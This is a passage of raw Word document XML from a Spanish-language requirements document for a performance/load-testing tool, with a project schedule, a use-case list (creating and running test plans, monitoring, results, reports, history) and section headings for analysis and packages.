          <w:p w14:paraId="3B2197B8" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="003D26AD"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t>17</w:t>
            </w:r>
            <w:r w:rsidRPr="003D26AD">
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:t>04</w:t>
            </w:r>
            <w:r w:rsidRPr="003D26AD">
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:t>2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="12C64BE2" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="003D26AD"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t>18</w:t>
            </w:r>
            <w:r w:rsidRPr="003D26AD">
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:t>04</w:t>
            </w:r>
            <w:r w:rsidRPr="003D26AD">
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:t>2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0030013F" w:rsidRPr="003D26AD" w14:paraId="39E340FC" w14:textId="77777777" w:rsidTr="00915A16">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C673226" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="003D26AD" w:rsidRDefault="0030013F" w:rsidP="00915A16">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="003D26AD">
              <w:t>Diseño de escenarios de prueba</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DFBE560" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="003D26AD"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rsidRPr="003D26AD">
              <w:t>2 días</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="639B5A3B" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="003D26AD"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t>18</w:t>
            </w:r>
            <w:r w:rsidRPr="003D26AD">
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:t>04</w:t>
            </w:r>
            <w:r w:rsidRPr="003D26AD">
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:t>2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59E178C7" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="003D26AD"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t>19</w:t>
            </w:r>
            <w:r w:rsidRPr="003D26AD">
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:t>04</w:t>
            </w:r>
            <w:r w:rsidRPr="003D26AD">
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:t>2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0030013F" w:rsidRPr="003D26AD" w14:paraId="6B25C626" w14:textId="77777777" w:rsidTr="0091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0E374" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="003D26AD" w:rsidRDefault="0030013F" w:rsidP="00915A16">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="003D26AD">
              <w:t>Ejecución de pruebas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A62C628" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="003D26AD"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rsidRPr="003D26AD">
              <w:t>3 días</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A58F7C0" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="003D26AD"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t>19</w:t>
            </w:r>
            <w:r w:rsidRPr="003D26AD">
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:t>04</w:t>
            </w:r>
            <w:r w:rsidRPr="003D26AD">
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:t>2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0225471D" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="003D26AD"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t>21</w:t>
            </w:r>
            <w:r w:rsidRPr="003D26AD">
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:t>04</w:t>
            </w:r>
            <w:r w:rsidRPr="003D26AD">
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:t>2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0030013F" w:rsidRPr="003D26AD" w14:paraId="12FD56E7" w14:textId="77777777" w:rsidTr="00915A16">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="232F9CDD" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="003D26AD" w:rsidRDefault="0030013F" w:rsidP="00915A16">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="003D26AD">
              <w:t>Análisis de resultados</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74A19AD5" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="003D26AD"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rsidRPr="003D26AD">
              <w:t>2 días</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76BDC155" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="003D26AD"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t>22</w:t>
            </w:r>
            <w:r w:rsidRPr="003D26AD">
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:t>04</w:t>
            </w:r>
            <w:r w:rsidRPr="003D26AD">
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:t>2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68AEBFB4" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="003D26AD"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t>24</w:t>
            </w:r>
            <w:r w:rsidRPr="003D26AD">
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:t>04</w:t>
            </w:r>
            <w:r w:rsidRPr="003D26AD">
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:t>2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0030013F" w:rsidRPr="003D26AD" w14:paraId="0ADE70D6" w14:textId="77777777" w:rsidTr="0091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B8EB9" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="003D26AD" w:rsidRDefault="0030013F" w:rsidP="00915A16">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="003D26AD">
              <w:t>Presentación de reporte final</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C9F0888" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="003D26AD"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rsidRPr="003D26AD">
              <w:t>1 día</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C16FB29" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="003D26AD"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t>25</w:t>
            </w:r>
            <w:r w:rsidRPr="003D26AD">
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:t>04</w:t>
            </w:r>
            <w:r w:rsidRPr="003D26AD">
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:t>2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38AE1EC0" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="003D26AD"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t>26</w:t>
            </w:r>
            <w:r w:rsidRPr="003D26AD">
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:t>04</w:t>
            </w:r>
            <w:r w:rsidRPr="003D26AD">
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:t>2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="129B875B" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F"/>
    <w:p w14:paraId="73A457B7" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>CAPTURA DE REQUISITOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C60763" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>LISTA DE CASOS DE USO</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Tablanormal1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="901"/>
        <w:gridCol w:w="3120"/>
        <w:gridCol w:w="4910"/>
      </w:tblGrid>
      <w:tr w:rsidR="0030013F" w:rsidRPr="001846B4" w14:paraId="32B33A96" w14:textId="77777777" w:rsidTr="00915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616D8" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="001846B4" w:rsidRDefault="0030013F" w:rsidP="00915A16">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001846B4">
              <w:lastRenderedPageBreak/>
              <w:t>Código</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24770097" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="001846B4" w:rsidRDefault="0030013F" w:rsidP="00915A16">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001846B4">
              <w:t>Nombre del Caso de Uso</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4910" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="045E5A1A" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="001846B4" w:rsidRDefault="0030013F" w:rsidP="00915A16">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001846B4">
              <w:t>Descripción</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0030013F" w:rsidRPr="001D1995" w14:paraId="766206ED" w14:textId="77777777" w:rsidTr="0091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B6D9A" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="001846B4" w:rsidRDefault="0030013F" w:rsidP="00915A16">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001846B4">
              <w:t>CU1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D087002" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="001846B4"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rsidRPr="001846B4">
              <w:t>Crear Plan de Prueba</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4910" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="67BDC601" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="001846B4"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rsidRPr="001846B4">
              <w:t>Permite al tester definir un nuevo plan de prueba (usuarios concurrentes, escenarios, peticiones).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0030013F" w:rsidRPr="001D1995" w14:paraId="78F45311" w14:textId="77777777" w:rsidTr="00915A16">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29B0A7E3" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="001846B4" w:rsidRDefault="0030013F" w:rsidP="00915A16">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001846B4">
              <w:t>CU2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7925779E" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="001846B4"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rsidRPr="001846B4">
              <w:t>Ejecutar Plan de Prueba</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4910" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D6AE588" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="001846B4"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rsidRPr="001846B4">
              <w:t>Permite lanzar la ejecución de un plan configurado y generar tráfico de prueba.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0030013F" w:rsidRPr="001D1995" w14:paraId="70402EEE" w14:textId="77777777" w:rsidTr="0091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3AA03" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="001846B4" w:rsidRDefault="0030013F" w:rsidP="00915A16">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001846B4">
              <w:t>CU3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="033E123B" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="001846B4"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rsidRPr="001846B4">
              <w:t>Consultar Estado de Ejecución</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4910" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F4E0C70" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="001846B4"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rsidRPr="001846B4">
              <w:t>Permite monitorear si la prueba está en curso, finalizada o fallida.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0030013F" w:rsidRPr="001D1995" w14:paraId="5D057C6C" w14:textId="77777777" w:rsidTr="00915A16">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6955562C" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="001846B4" w:rsidRDefault="0030013F" w:rsidP="00915A16">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001846B4">
              <w:t>CU4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09D7BD9D" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="001846B4"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rsidRPr="001846B4">
              <w:t>Analizar Resultados</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4910" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3491EB87" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="001846B4"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rsidRPr="001846B4">
              <w:t>Permite visualizar los resultados crudos de la ejecución: tiempos de respuesta, errores, throughput.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0030013F" w:rsidRPr="001D1995" w14:paraId="5447C045" w14:textId="77777777" w:rsidTr="0091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32808" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="001846B4" w:rsidRDefault="0030013F" w:rsidP="00915A16">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001846B4">
              <w:t>CU5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60A38ADA" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="001846B4"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rsidRPr="001846B4">
              <w:t>Generar Reporte de Prueba</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4910" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D12C620" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="001846B4" w:rsidRDefault="0030013F" w:rsidP="00915A16">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001846B4">
              <w:t>Permite crear un reporte formal (HTML/CSV/JSON) basado en los resultados obtenidos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0030013F" w:rsidRPr="001D1995" w14:paraId="0C7BFAB7" w14:textId="77777777" w:rsidTr="00915A16">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FA800A4" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="001846B4" w:rsidRDefault="0030013F" w:rsidP="00915A16">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
            </w:pPr>
            <w:r w:rsidRPr="001846B4">
              <w:t>CU6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3120" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B2D6ACB" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="001846B4"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rsidRPr="001846B4">
              <w:t>Visualizar Historial de Ejecuciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4910" w:type="dxa"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2866D812" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="001846B4" w:rsidRDefault="0030013F" w:rsidP="00915A16">
            <w:pPr>
              <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r w:rsidRPr="001846B4">
              <w:t>Permite al usuario consultar ejecuciones anteriores y sus métricas históricas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B4DFF99" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A533E23" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7683AF56" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00B52F07" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ESTRUCTURAR CASOS DE USO</w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58DBF4C3" wp14:editId="0949B868">
            <wp:extent cx="2624827" cy="4802588"/>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278" cy="4810731"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EA624A" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00B52F07" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EC98807" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00B52F07" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34743189" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00B52F07" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="689D2910" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00B52F07" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="703D31E9" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00B52F07" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76B0B572" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00B52F07" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="742DD5B7" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00B52F07" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FE2B980" w14:textId="35A0A31B" w:rsidR="0030013F" w:rsidRPr="00B52F07" w:rsidRDefault="0030013F" w:rsidP="00B52F07">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ANALISIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F371CA" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00B52F07" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>IDENTIFICAR PAQUETES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116129D4" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:r w:rsidRPr="00295C39">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C341FE8" wp14:editId="26B8F4FA">
            <wp:extent cx="5499100" cy="21526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2152650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="578E5C84" w14:textId="77777777" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
